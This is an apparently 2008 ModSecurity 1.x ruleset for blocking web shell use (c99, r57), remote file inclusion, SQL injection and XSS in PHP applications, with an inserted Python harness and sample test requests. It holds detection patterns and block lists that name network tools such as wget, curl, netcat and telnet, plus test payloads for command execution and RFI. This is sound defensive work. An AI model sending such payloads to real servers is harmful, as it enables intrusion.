SecFilterSelective REQUEST_URI "/therules25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/xpl\.php\?&(cmd|command)="
SecFilterSelective REQUEST_URI "/(ssh2?|sfdg2)\.php"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)(\;|\w)"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)\.(txt|php|gif|jpe?g|dat|bmp|png)(\;|\w)"
SecFilterSelective REQUEST_URI "/dblib\.php\?&(cmd|command)="
SecFilterSelective THE_REQUEST|HTTP_Content-Disposition "/(suntzu.*|suntzu)\.php\?cmd="
SecFilterSelective THE_REQUEST "/proxysx\.(gif|jpe?g|bmp|txt|asp|png)\?"
SecFilterSelective THE_REQUEST "/(phpbackdoor|phpbackdoor.*)\.php\?cmd="
SecFilterSelective REQUEST_URI "/oops?&"
SecFilterSelective THE_REQUEST "wiki_up/.*\.(php(3|4)?|tml|cgi|sh)"
SecFilterSelective THE_REQUEST "(wiki_up|temp)/(gif|ion|jpe?g|lala)\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/(too20|phpshell|shell)\.ph(p(3|4)?|tml)"
SecFilterSelective REQUEST_URI "/phpterm"
SecFilterSelective THE_REQUEST "(netenberg |psybnc |fantastico_de_luxe |arta\.zip )"
SecFilterSelective REQUEST_URI "/iblis\.htm\?"
SecFilterSelective REQUEST_URI "/gif\.gif\?"
SecFilterSelective REQUEST_URI "/go\.php\.txt\?"
SecFilterSelective REQUEST_URI "/sh[0-9]\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/iys\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/shell[0-9]\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/zehir\.asp"
SecFilterSelective REQUEST_URI "/aflast\.txt\?"
SecFilterSelective REQUEST_URI "/sikat\.txt\?&cmd"
SecFilterSelective REQUEST_URI "/t\.gif\?"
SecFilterSelective REQUEST_URI "/phpbb_patch\?&"
SecFilterSelective REQUEST_URI "/phpbb2_patch\?&"
SecFilterSelective REQUEST_URI "/lukka\?&"
SecFilterSelective REQUEST_URI "/c99shell\.txt"
SecFilterSelective REQUEST_URI "/c99\.txt\?"
SecFilterSelective REQUEST_URI "/shell\.php\&cmd="
SecFilterSelective ARGS "/shell\.php\&cmd="
SecFilterSelective THE_REQUEST "HiMaster\!\<\?php system\("
SecFilterSelective THE_REQUEST "error_reporting\(.*\)\;if\(isset\(.*\)\)\{system"
SecFilterSelective REQUEST_URI "help_text_vars\.php\?suntzu="
SecFilterSelective REQUEST_URI "/docLib/cmd\.asp"
SecFilterSelective REQUEST_URI "\.asp\?pageName=AppFileExplorer"
SecFilterSelective REQUEST_URI "\.asp\?.*showUpload&thePath="
SecFilterSelective REQUEST_URI "\.asp\?.*theAct=inject&thePath="
SecFilterSelective REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"
SecFilterSelective REQUEST_URI "shell\.txt"
SecFilterSelective REQUEST_URI "w00tw00t\.at\.ISC\.SANS\.DFind"
SecFilterSelective POST_PAYLOAD "((stripslashes|passthru)\(\$_REQUEST\[\"|if \(get_magic_quotes_gpc\()"
SecFilterSelective THE_REQUEST "PUT /.*_@@RNDSTR@@"
SecFilterSelective THE_REQUEST "trojan\.htm"
SecFilterSelective REQUEST_URI "/r57en\.php"
SecFilterSelective REQUEST_URI "btn_lists\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "dsoul/tool\?"
SecFilterSelective REQUEST_URI "anggands\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "newfile[0-9]\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/vsf\.vsf\?&"
SecFilterSelective REQUEST_URI "/scan1\.0/scan/"
SecFilterSelective REQUEST_URI "test\.txt\?&"
SecFilterSelective REQUEST_URI "\.k4ka\.txt\?"
SecFilterSelective REQUEST_URI "/php\.txt\?"
SecFilterSelective REQUEST_URI "/sql\.txt\?"
SecFilterSelective REQUEST_URI "bind\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/juax\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/linuxdaybot/\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective THE_REQUEST "/c99shell"
SecFilterSelective THE_REQUEST "/shell\.php\&cmd="
SecFilterSelective THE_REQUEST "\act=ls\&d=" chain
SecFilterSelective THE_REQUEST "\&sort=0a" "msg:'c99shell'"
SecFilterSelective THE_REQUEST "\act=(search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback)\&d=" "msg:'c99shell'"
SecFilter "/tmp/cmdtemp"
SecFilterSelective THE_REQUEST "cmdtemp"
SecFilter "/tmp/back"
SecFilter "/tmp/pi.pl"
SecFilterSelective THE_REQUEST "sess31002"
SecFilterSelective THE_REQUEST "ssh-scan"
SecFilterSelective THE_REQUEST "/<\?php\x20"
SecFilterSelective THE_REQUEST "r57shell"
SecFilterSelective THE_REQUEST "step57.info"
SecFilterSelective POST_PAYLOAD "step57.info"
SecFilterSelective THE_REQUEST "\&cmd=/usr/bin/pe"
SecFilterSelective THE_REQUEST "cmd=echo\x20"
SecFilterSelective POST_PAYLOAD "cmd=" chain
SecFilterSelective POST_PAYLOAD "dir=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 1'"
SecFilterSelective THE_REQUEST "wh4.whsrv.com" "msg:'r57shell 2'"
SecFilterSelective POST_PAYLOAD "wh4.whsrv.com" "msg:'r57shell 2'"
SecFilterSelective THE_REQUEST "rst.void.ru" "msg:'r57shell 3'"
SecFilterSelective POST_PAYLOAD "rst.void.ru" "msg:'r57shell 3'"
SecFilterSelective POST_PAYLOAD "alias=(find|list|show|ls|uname|who|pwd|uptime)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 5'"
SecFilterSelective POST_PAYLOAD "cmd=(find|list|show|ls|uname|who|pwd|uptime|wget|GET|gcc|links|lynx|fetch|curl)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 6'"
SecFilterSelective POST_PAYLOAD "s_text=" chain
SecFilterSelective POST_PAYLOAD "s_dir=" chain
SecFilterSelective POST_PAYLOAD "s_mask=" chain
SecFilterSelective POST_PAYLOAD "cmd=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 7'"
SecFilterSelective POST_PAYLOAD "with=" chain
SecFilterSelective POST_PAYLOAD "rem_file=" chain
SecFilterSelective POST_PAYLOAD "loc_file=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 8'"
SecFilterSelective POST_PAYLOAD "bind_pass=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 9'"
SecFilterSelective POST_PAYLOAD "use=(C|Perl)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 10'"
SecFilterSelective THE_REQUEST "act=f\&f=" chain
SecFilterSelective THE_REQUEST "\&d=" "msg:'c99shell'"
SecFilterSelective THE_REQUEST "act=f\&f=" chain
SecFilterSelective THE_REQUEST "\&ft=(info|edit|download)\&d=" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "actarcbuff_path=" chain
SecFilterSelective POST_PAYLOAD "act=" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "act=cmd\&d=" chain
SecFilterSelective POST_PAYLOAD "\&cmd=" chain
SecFilterSelective POST_PAYLOAD "\&submit=Execute" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "act=(search|upload|mkdir|mkfile|ls|gofile)" chain
SecFilterSelective POST_PAYLOAD "search_name_regexp=" chain
SecFilterSelective POST_PAYLOAD "search_name=" chain
SecFilterSelective POST_PAYLOAD "d=" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "dir" chain
SecFilterSelective POST_PAYLOAD "new_name" chain
SecFilterSelective POST_PAYLOAD "submit" "msg:'r57shell upload'"
SecFilterSelective POST_PAYLOAD "d_name=" chain
SecFilterSelective POST_PAYLOAD "cmd=" chain
SecFilterSelective POST_PAYLOAD "dir=" chain
SecFilterSelective POST_PAYLOAD "submit" "msg:'r57shell 4'"
SecFilter "(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])" "rev:1,log,deny,msg:'Malicious Activity'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-02.dos.conf: 2008-04-16 18:15:07.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "and.+char\(.*\).+user.+char\(.*\)"
SecFilterSelective THE_REQUEST "select.*from.*information_schema\.tables"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-4images.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/config\.dist\.php\?" "rev:1,id:HG2007071401,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/index\.php\?template=\.\." "rev:1,id:HG2007071402,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/(top\.php|member\.php|search\.php)\?" "chain,rev:1,id:HG2007071403,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-2214 CVE-2006-5236'"
SecFilterSelective REQUEST_URI "(search_user=|sessionid=)" chain
SecFilterSelective REQUEST_URI "(JOIN|SELECT|\*\*|DROP|OR|union|user_password|user_name|images_users|where)"
SecFilterSelective REQUEST_URI "/search\.php\?" "chain,rev:1,id:HG2007071201,deny,severity:5,msg:'SQLi: 4Images 1.7.x CVE-2006-5236'"
SecFilterSelective REQUEST_URI "search_user=.*(user_password|user_name|images_users|union|concat)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-advancedguestbook.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-auctionsphp.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/includes/errors\.php\?" "chain,rev:1,id:HG2007111601,deny,severity:5,msg:'AuctionPHP RFI: error='"
SecFilterSelective ARG_error "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/includes/(settings|messages)\.inc\.php\?" "chain,rev:1,id:HG2007111602,deny,severity:5,msg:'AuctionPHP RFI: include_path='"
SecFilterSelective ARG_include_path "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-awstats.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective THE_REQUEST "awstats" chain
SecFilterSelective ARGS "(pluginmode|loadplugin|debug|configdir|perl|cgi|chmod|exec|print)"
SecFilterSelective REQUEST_URI "/awstats\.pl\?(configdir|update|pluginmode|cgi)=(\||echo|\:system\()"
SecFilterSelective REQUEST_URI "/awstats\.pl\?(debug=1|pluginmode=rawlog\&loadplugin=rawlog|update=1\&logfile=\|)"
SecFilterSelective REQUEST_URI "/awstats\.pl\?[^\r\n]*logfile=\|"
SecFilterSelective REQUEST_URI "/awstats\.pl\?configdir="
SecFilterSelective REQUEST_URI "awstats\.pl\?" chain
SecFilterSelective ARGS "(debug|configdir|perl|chmod|exec|print|cgi)"
SecFilterSelective THE_REQUEST "/awstats\.pl HTTP\/(0\.9|1\.0|1\.1)$" "rev:1,deny,msg:'AWStats Exploit Probe'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-bosclassifieds.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?" chain
SecFilterSelective ARG_insPath "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-confixxserver.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin/business_inc/saveserver\.php\?" "chain,rev:1,deny,log,msg:'Confixx RFI'"
SecFilterSelective ARG_thisdir "(\.\./\.\.|/|(http|https|ftp)\:/)"
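The following Python harness is an added example; it is not part of the ruleset above and not ModSecurity code. It re-implements just enough of the 1.x semantics to exercise a handful of the rules above offline: the variables they select on (REQUEST_URI, THE_REQUEST, POST_PAYLOAD, ARGS, ARG_<name> and the "A|B" variable-list form), the `chain` flag, and `msg:` extraction. The `Request`, `Rule`, `inspect` and `bell_bug_demo` names are the example's own. It assumes patterns were applied case-insensitively to URL-decoded values, as ModSecurity 1.x did by default. The sample requests are constructed test inputs, not captured traffic; one of them shows why the bare `/` alternative in the RFI pattern fires on ordinary path values, and `bell_bug_demo` shows the dead `\act=` pattern from the c99 rules.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, unquote

# Rules copied from the sets above; the c99 chain is written with "act=" where the
# page's original reads "\act=" (see bell_bug_demo).
RULES = r'''
SecFilterSelective THE_REQUEST "/c99shell"
SecFilterSelective THE_REQUEST "act=ls\&d=" chain
SecFilterSelective THE_REQUEST "\&sort=0a" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "cmd=(find|list|show|ls|uname|who|pwd|uptime|wget|GET|gcc|links|lynx|fetch|curl)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 6'"
SecFilterSelective REQUEST_URI "/admin/business_inc/saveserver\.php\?" "chain,rev:1,deny,log,msg:'Confixx RFI'"
SecFilterSelective ARG_thisdir "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/awstats\.pl\?[^\r\n]*logfile=\|"
'''
TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # a double-quoted token or a bare word

@dataclass
class Rule:
    variables: list        # e.g. ["ARG_t", "ARG_cat"] from the 1.x "ARG_t|ARG_cat" form
    pattern: "re.Pattern"
    chain: bool            # AND this rule with the one that follows it
    msg: str

def parse_rules(text):
    rules = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        toks = [m.group(1) if m.group(1) is not None else m.group(2) for m in TOKEN.finditer(line)]
        if toks[0] != "SecFilterSelective":
            raise ValueError(f"directive not modelled: {toks[0]}")
        actions = ",".join(toks[3:])  # "chain" alone, or "chain,rev:1,...,msg:'...'"
        msg = re.search(r"msg:'([^']*)'", actions)
        # Assumption: 1.x matched patterns case-insensitively; adjust if your build differed.
        rules.append(Rule(toks[1].split("|"), re.compile(toks[2], re.IGNORECASE),
                          "chain" in actions.split(","), msg.group(1) if msg else ""))
    return rules

def group_chains(rules):
    """Group each `chain` rule with its successors; a chain fires only if every rule matches."""
    chains, current = [], []
    for rule in rules:
        current.append(rule)
        if not rule.chain:
            chains.append(current)
            current = []
    if current:
        raise ValueError("last rule still has `chain` set")
    return chains

@dataclass
class Request:
    method: str
    uri: str        # path plus query string, as REQUEST_URI carried it in 1.x
    body: str = ""  # POST_PAYLOAD

    def values(self, var):
        """Values a 1.x variable name selects, URL-decoded as the engine normalised them."""
        query = self.uri.partition("?")[2]
        if var == "REQUEST_URI":
            return [unquote(self.uri)]
        if var == "THE_REQUEST":
            return [unquote(f"{self.method} {self.uri} HTTP/1.1")]
        if var == "POST_PAYLOAD":
            return [unquote(self.body)]
        if var == "ARGS":
            return [unquote(query) + "&" + unquote(self.body)]
        if var.startswith("ARG_"):
            args = dict(parse_qsl(query, keep_blank_values=True) + parse_qsl(self.body, keep_blank_values=True))
            return [args[var[4:]]] if var[4:] in args else []
        raise ValueError(f"variable not modelled: {var}")

def rule_matches(rule, req):
    return any(rule.pattern.search(v) for var in rule.variables for v in req.values(var))

def inspect(req, chains):
    """Return the msg (or, lacking one, the leading pattern) of every chain that fires."""
    return [next((r.msg for r in chain if r.msg), chain[0].pattern.pattern)
            for chain in chains if all(rule_matches(r, req) for r in chain)]

def bell_bug_demo():
    # The page's original c99 patterns begin with "\act=". PCRE, like Python's re, reads
    # \a as BEL (0x07), so as written the rule can never match the text "act=ls&d=".
    line = "GET /c99.php?act=ls&d=/tmp HTTP/1.1"
    as_written = re.compile(r"\act=ls\&d=", re.IGNORECASE).search(line) is not None
    corrected = re.compile(r"act=ls\&d=", re.IGNORECASE).search(line) is not None
    return as_written, corrected

CHAINS = group_chains(parse_rules(RULES))

# Constructed test requests, not captured traffic (203.0.113.5 is a documentation address).
SAMPLES = {
    "c99 listing": Request("GET", "/images/c99.php?act=ls&d=/var/www&sort=0a"),
    "r57 command": Request("POST", "/tmp/r57.php", "cmd=uname+-a&dir=/tmp&submit=Execute"),
    "confixx rfi": Request("GET", "/admin/business_inc/saveserver.php?thisdir=http://203.0.113.5/x.txt?"),
    "confixx slash": Request("GET", "/admin/business_inc/saveserver.php?thisdir=sites/default"),  # false positive: bare "/" alternative
    "awstats pipe": Request("GET", "/cgi-bin/awstats.pl?update=1&logfile=|ls"),
    "benign": Request("GET", "/index.php?page=about&sort=0a"),  # "&sort=0a" alone does not complete the chain
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(f"{name:14s} -> {inspect(req, CHAINS) or 'no match'}")
    print("as written / corrected:", bell_bug_demo())
```

Two things the run makes visible. First, `chain` is a conjunction: the benign request carries `&sort=0a` but not `act=ls&d=`, so the c99 chain stays quiet, while the listing request trips it even though its path never contains "c99shell". Second, the RFI argument pattern `(\.\./\.\.|/|(http|https|ftp)\:/)` used throughout these files has a bare `/` alternative, so any value containing a slash (`sites/default`) is denied exactly like a remote URL; tighten it to the `\.\./\.\.|(http|https|ftp)\:/` form used in some of the later rules if that parameter legitimately carries paths.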

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-coppermine.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?lang=.*((javascript|script|about|applet|activex|chrome)*>|html|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/albmgr\.php\?" "chain,rev:1,id:HG2007063006,deny:503,severity:5,msg:'HG: SQLi: CopperMine'"
SecFilterSelective ARG_cat "(user_name|user_password|union|drop|select|truncate|from|concat)"
SecFilterSelective REQUEST_URI "/relocate_server\.php"
SecFilterSelective REQUEST_URI "/theme\.php\?" "chain,rev:1,id:HG2007102010,deny:503,severity:5,msg:'HG: RFI: CopperMine'"
SecFilterSelective ARG_THEME_DIR "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007102601,deny,log,msg:'Coppermine XSS'"
SecFilterSelective ARG_lang "((javascript|script|about|applet|activex|chrome)*\>|html|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-cubecart.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?&PHPSESSID=\'"
SecFilterSelective REQUEST_URI "/tellafriend\.php\?&product=\'"
SecFilterSelective REQUEST_URI "/view_cart\.php\?add=\'"
SecFilterSelective REQUEST_URI "/view_product\.php\?product=\'"
SecFilterSelective REQUEST_URI "/orderSuccess\.inc\.php\?" chain
# Parameter name as in the CVE-2004-1580 rule in modsec-fantastico.conf (glob[rootDir]); the original read ARG_[rootDir].
SecFilterSelective "ARG_glob[rootDir]" "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-dotproject.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?m=(companies|projects)" "chain,rev:1,id:HG2007101881,deny,severity:5,msg:'dotProject AuthBypass'"
SecFilterSelective "ARG_user_cookie" "1"
SecFilterSelective "ARG_baseDir" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101880,deny,severity:5,msg:'dotProject RFI'"
SecFilterSelective "ARG_dPconfig[root_dir]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101883,deny,severity:5,msg:'dotProject RFI'"
SecFilterSelective REQUEST_URI "/docs/(check|phpinfo)\.php" "rev:1,id:HG2007101882,deny,severity:5,msg:'dotProject Info Disclosure'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-drupal.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilter "\<.*php .*\(.*\)\;system\(.*\).*php*\>"
SecFilter "\<.*php .*\(.*\)\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\).*php*\>"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-esupport.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/autoclose\.php\?" chain
SecFilterSelective ARG_subd "(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-fantastico.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/config\.dist\.php\?" "rev:1,id:HG2007071401,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/index\.php\?template=\.\." "rev:1,id:HG2007071402,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/(top\.php|member\.php|search\.php)\?" "chain,rev:1,id:HG2007071403,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-2214 CVE-2006-5236'"
SecFilterSelective REQUEST_URI "(search_user=|sessionid=)" chain
SecFilterSelective REQUEST_URI "(JOIN|SELECT|\*\*|DROP|OR|union|user_password|user_name|images_users|where)"
SecFilterSelective REQUEST_URI "(common\.inc\.php|comments\.php|booth\.php|page\.php|png\.php|poll_ssi\.php|popup\.php)" "chain,rev:1,id:HG2007071403,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-2214 '"
SecFilterSelective REQUEST_URI "(base_path|template_set|id|action)=" "chain"
SecFilterSelective REQUEST_URI "\;"
SecFilterSelective REQUEST_URI "/import-mt\.php\?" "chain,rev:1,id:HG2007071810,deny,severity:5,msg:'RFI: b2Evolution: CVE-2006-6417'"
SecFilterSelective REQUEST_URI "(basepath|inc_path)=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(init\.inc\.php|theme\.php)\?" "chain,rev:1,id:HG2007071811,deny,severity:5,msg:'RFI: CopperMine SA11524'"
SecFilterSelective REQUEST_URI "(CPG_M_DIR|THEME_DIR)=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/init\.inc\.php\?" "chain,rev:1,id:HG2007071812,deny,severity:5,msg:'RFI: CopperMine SA11524'"
SecFilterSelective REQUEST_URI "(JOIN|SELECT|\*\*|DROP|OR|union|user_password|user_name|images_users|where)"
SecFilterSelective REQUEST_URI "/relocate_server\.php" "rev:1,id:HG2007071813,deny,severity:5,msg:'CVE-2005-3979: CopperMine config exposure'"
SecFilterSelective REQUEST_URI "/thumbnails\.php\?=" "chain,rev:1,id:HG2007071814,deny,severity:5,msg:'CVE-2006-0872/3: CopperMine Shellcode Exec'"
SecFilterSelective REQUEST_URI "\.\.|(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index\.php\?file=" "chain,rev:1,id:HG2007071815,deny,severity:5,msg:'CVE-2006-1909: CopperMine RFI'"
SecFilterSelective REQUEST_URI "(\.\.|\./)"
SecFilterSelective REQUEST_URI "/(usermgr\.php|db_ecard\.php|albmgr\.php)\?" "chain,rev:1,id:HG2007071816,deny,severity:5,msg:'CVE-2006-3064: CopperMine RFI'"
SecFilterSelective REQUEST_URI "(SELECT|FROM|WHERE|ORDER BY|LIMIT|JOIN|SELECT|DROP|union)"
SecFilterSelective REQUEST_URI "/picmgr\.php\?" "chain,rev:1,id:HG2007071817,deny,severity:5,msg:'CVE-2006-5622: CopperMine RFI'"
SecFilterSelective REQUEST_URI "aid=" "chain"
SecFilterSelective REQUEST_URI "(SELECT|FROM|WHERE|ORDER BY|LIMIT|JOIN|SELECT|DROP|UNION)"
SecFilterSelective REQUEST_URI "/E2_header\.inc\.php\?" "chain,rev:1,id:HG2007071818,deny,severity:5,msg:'CVE-2007-0835: CopperMine RFI'"
SecFilterSelective REQUEST_URI "boarddir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/slides\.php\?" "chain,rev:1,id:HG2007071819,deny,severity:5,msg:'SA11789: Crafty Syntax'"
SecFilterSelective REQUEST_URI "limitquery_s=" "chain"
SecFilterSelective REQUEST_URI "%5cx61%5cx6e%5cx64%5cx20%5cx31%5cx3d%5cx30%5cx20%5cx75%5cx6e%5cx69%5cx6f%5cx6e%5cx20"
SecFilterSelective REQUEST_URI "/orderSuccess\.inc\.php\?" "chain,rev:1,id:HG2007071820,deny,severity:5,msg:'CVE-2004-1580: CubeCart RFI'"
SecFilterSelective REQUEST_URI "&glob\[rootDir\]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/orderSuccess\.inc\.php\?" "chain,rev:1,id:HG2007071821,deny,severity:5,msg:'CVE-2006-4525/6/7: CubeCart RFI'"
SecFilterSelective REQUEST_URI "oid=" "chain"
SecFilterSelective REQUEST_URI "(SELECT|FROM|WHERE|ORDER BY|LIMIT|JOIN|SELECT|DROP|UNION|SUBSTRING|admin_users)"
SecFilterSelective REQUEST_URI "(/admin/header\.inc\.php|/admin/footer\.inc\.php)\?" "chain,rev:1,id:HG2007071822,deny,severity:5,msg:'CVE-2006-5107: CubeCart RFI'"
SecFilterSelective REQUEST_URI "(la_adm_header|la_pow_by|site_name)=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/core\.php|/modules/index_table\.php|/modules/addedit\.php|/modules/view\.php|/modules/vw_files\.php|/modules/viewgantt\.php)\?" "chain,rev:1,id:HG2007071901,deny,severity:5,msg:'SA7961: RFI: dotProject'"
SecFilterSelective REQUEST_URI "root_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/classes/query\.class\.php|/includes/db_adodb\.php|/includes/db_connect\.php|/includes/session\.php|/modules/admin/vw_usr_roles\.php|/modules/public/calendar\.php|/modules/public/date_format\.php)\?" "chain,rev:1,id:HG2007071902,deny,severity:5,msg:'CVE-2006-0754: dotProject RFI'"
SecFilterSelective REQUEST_URI "baseDir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/modules/projects/gantt\.php|/modules/projects/vw_files\.php|/modules/projects/gantt2\.php)\?" "chain,rev:1,id:HG2007071903,deny,severity:5,msg:'CVE-2006-0754: dotProject RFI'"
SecFilterSelective REQUEST_URI "dPconfig\[root_dir\]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/docs/phpinfo\.php|/docs/check\.php)" "rev:1,id:HG2007071904,deny,severity:5,msg:'CVE-2006-5107: dotProject info disclosure'"
SecFilterSelective ARG_mosConfig_live_site "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101701,deny,severity:5,msg:'Joomla: Reg Globals mosConfig_live_site RFI'"
SecFilterSelective ARG_mosConfig_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101702,deny,severity:5,msg:'Joomla: Reg Globals mosConfig_absolute_path RFI'"
SecFilterSelective REQUEST_URI "/components/com_restaurante/img_original/\..*" "rev:1,id:HG2007101710,deny,severity:5,msg:'RFI: Joomla Restaurante Upload'"
SecFilterSelective REQUEST_URI "/components/com_content/models/(archive|category|section)\.php" "chain,rev:1,id:HG2007101711,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective ARGS "(UNION|SELECT|password|username|FROM|concat|jos_users)"
SecFilterSelective REQUEST_URI "index\.php\?" "chain,rev:1,id:HG2007101712,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective REQUEST_URI "option=com_(eventlist|ezine|frontpage|gmaps|jombib|neorecruit|nicetalk|philaform|ponygallery|resman|rwcards|search)" chain
SecFilterSelective REQUEST_URI "(concat|jos_users|password|select|union|username|usertype)"
SecFilterSelective REQUEST_URI "index\.php\?option=com_rsfiles" "chain,rev:1,id:HG2007101714,deny,severity:5,msg:'RFI: Joomla RSFiles DL'"
SecFilterSelective REQUEST_URI "path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/libraries/pcl/pcltar\.php\?" "chain,rev:1,id:HG2007101720,deny,severity:5,msg:'RFI: Joomla 1.5'"
SecFilterSelective REQUEST_URI "g_pcltar_lib_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/com_articles\.php\?" "chain,rev:1,id:HG2007101723,deny,severity:5,msg:'RFI: Joomla Article 1.1'"
SecFilterSelective REQUEST_URI "absolute_path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_joomlaboard/file_upload\.php\?" "chain,rev:1,id:HG2007101731,deny,severity:5,msg:'RFI: Joomla Joomlaboard 1.1.1'"
SecFilterSelective REQUEST_URI "sbp=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_webring/admin\.webring\.docs\.php\?" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'RFI: Joomla WebRing'"
SecFilterSelective REQUEST_URI "component_dir=(http|https|ftp)\:"
